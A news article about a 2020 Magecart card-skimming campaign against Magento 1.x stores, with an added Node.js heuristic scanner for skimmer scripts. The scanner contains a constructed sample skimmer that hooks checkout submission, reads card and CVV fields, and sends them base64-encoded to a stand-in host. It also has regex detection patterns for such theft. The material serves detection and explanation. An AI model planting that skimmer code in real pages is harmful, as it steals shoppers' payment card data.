Willem de Groot, a well-known information security researcher and the founder of Sanguine Security (Sansec), has warned of the largest campaign to date against online stores running the Magento e-commerce platform. By his account it is the biggest attack Sansec has recorded since it began tracking such incidents in 2015.
“Last Friday, 10 stores were infected, then 1058 on Saturday, 603 on Sunday, and 233 more today,” de Groot wrote on Monday, September 14, 2020. “This automated campaign is the largest ever detected by Sansec since the start of observations in 2015. The previous record was 962 hacked stores in one day in July last year.”
All of the incidents follow the familiar MageCart pattern: the attackers broke into the sites and injected malicious JavaScript into their pages, code that records the payment card details shoppers type in at checkout and sends them to the attackers.
The name MageCart originally referred to a single group, the first to plant web skimmers (malicious card-stealing code) on the pages of online stores. The approach proved so profitable that the group quickly attracted imitators, and MageCart has since become a generic label for the whole class of such attacks.
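The pattern described above, as an added example that is not Sansec's tooling or anything taken from the campaign itself: a small Node.js heuristic that scans a checkout page's inline scripts for the traits a web skimmer needs (reading the card fields, hooking the form, encoding the data, and sending it to a host the shop does not normally talk to) and flags scripts that show several of them at once. The two sample pages, the shop host `shop.example`, the exfiltration host `static.example-cdn.invalid` and the indicator threshold are all constructed for this illustration.

```javascript
// Added example, not Sansec's code: an offline heuristic scan of the inline
// <script> blocks on a checkout page for the traits Magecart-style web
// skimmers share. Sample pages and host names below are constructed.

// Magento 1 checkout field names (cc_number, cc_cid, cc_exp_month,
// cc_exp_year) plus common generic spellings.
const CARD_FIELD_RE = /\b(cc_number|cc_cid|cc_exp_month|cc_exp_year|card[_-]?number|cvv|cvc)\b/i;
// Hooking the moment the shopper submits or edits the form.
const HOOK_RE = /addEventListener\s*\(\s*['"](submit|click|mousedown|keyup|change|input)['"]|onsubmit\s*=|\.submit\s*=/;
// Primitives a skimmer uses to get the data off the page.
const EXFIL_RE = /fetch\s*\(|XMLHttpRequest|navigator\.sendBeacon|new\s+Image\s*\(|\.src\s*=\s*['"]https?:/;
// Encoding or light obfuscation of the stolen payload.
const ENCODE_RE = /\b(btoa|atob|encodeURIComponent|String\.fromCharCode|unescape)\s*\(/;
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Return the bodies of inline <script> blocks. External src= scripts are
// skipped here; they would have to be fetched and scanned separately.
function extractInlineScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (!/\bsrc\s*=/i.test(m[1]) && m[2].trim()) scripts.push(m[2]);
  }
  return scripts;
}

// Every host name that appears in a literal http(s) URL inside the script.
function hostsIn(js) {
  const hosts = new Set();
  for (const m of js.matchAll(URL_RE)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// List the skimmer indicators present in one script body.
function scoreScript(js, allowedHosts) {
  const indicators = [];
  if (CARD_FIELD_RE.test(js)) indicators.push('reads card fields');
  if (HOOK_RE.test(js)) indicators.push('hooks form events');
  if (EXFIL_RE.test(js)) indicators.push('uses a network exfil primitive');
  if (ENCODE_RE.test(js)) indicators.push('encodes a payload');
  const foreign = hostsIn(js).filter((h) => !allowedHosts.includes(h));
  if (foreign.length) indicators.push('contacts unlisted host(s): ' + foreign.join(', '));
  return indicators;
}

// Flag inline scripts showing at least `threshold` indicators. A legitimate
// card-number formatter touches card fields and hooks input events (2 hits);
// a skimmer usually shows 4 or 5. The threshold is a constructed choice.
function scanPage(html, allowedHosts, threshold = 3) {
  return extractInlineScripts(html)
    .map((js, index) => ({ index, indicators: scoreScript(js, allowedHosts) }))
    .filter((r) => r.indicators.length >= threshold);
}

// Constructed sample: a clean Magento 1 style checkout page with one external
// script and one benign inline formatter.
const CLEAN_PAGE = `
<html><body>
<form id="checkout" action="/checkout/onepage/savePayment/">
  <input id="cc_number" name="payment[cc_number]">
  <input id="cc_cid" name="payment[cc_cid]">
</form>
<script src="https://shop.example/js/checkout.js"></script>
<script>
  document.getElementById('cc_number').addEventListener('input', function (e) {
    e.target.value = e.target.value.trim();
  });
</script>
</body></html>`;

// Constructed sample of an injected skimmer: hook submit, read the card
// fields, base64 the result, smuggle it out as an image request.
const INJECTED_SKIMMER = `
<script>
  document.getElementById('checkout').addEventListener('submit', function () {
    var d = { n: document.getElementById('cc_number').value,
              c: document.getElementById('cc_cid').value };
    new Image().src = 'https://static.example-cdn.invalid/pixel.gif?d=' + btoa(JSON.stringify(d));
  });
</script>`;

const SKIMMED_PAGE = CLEAN_PAGE.replace('</body>', INJECTED_SKIMMER + '\n</body>');
const ALLOWED_HOSTS = ['shop.example']; // hosts the shop legitimately loads from

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanPage(SKIMMED_PAGE, ALLOWED_HOSTS), null, 2));
}
```

Run it with `node` to see the injected block reported with all five indicators while the benign formatter, which shares two of them, stays below the threshold. Static matching like this is a triage aid, not a detector: external scripts and script tags built at runtime are not covered, and real skimmers are usually obfuscated, so pair it with a diff of the served page against a known-good copy and a review of the server-side files and database entries (Magento 1 stores layout and block content in the database) where a compromised store's injection actually lives.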
Sansec's researchers report that most of the hacked sites were running Magento 1.x, an outdated branch whose support ended for good on June 30, 2020. Last year security researchers had predicted a surge of attacks on Magento 1.x, estimating that between 200,000 and 240,000 sites could end up exposed. The number of stores still on the 1.x branch has since fallen, and currently stands at about 95,000.
ZDNet also recalls that this summer some security specialists were troubled by the fact that no new vulnerabilities in Magento 1.x had been disclosed for a long time. That was an unusual picture, since the 1.x branch had long been regarded as old and riddled with holes. The concern was that attackers were deliberately holding back their Magento 1.x exploits until the end of support, so that Adobe's developers would no longer patch the bugs they relied on. It looks as if those concerns were justified.
Sansec's analysts have yet to establish exactly how the sites were compromised, but de Groot notes that an advertisement for a Magento 1.x zero-day appeared on a hacker forum last month, which he reads as further evidence that the attackers were biding their time. In the ad, a user going by z3r0day offered an RCE exploit for $5,000. Whether that exploit is the one used in this campaign has not been confirmed.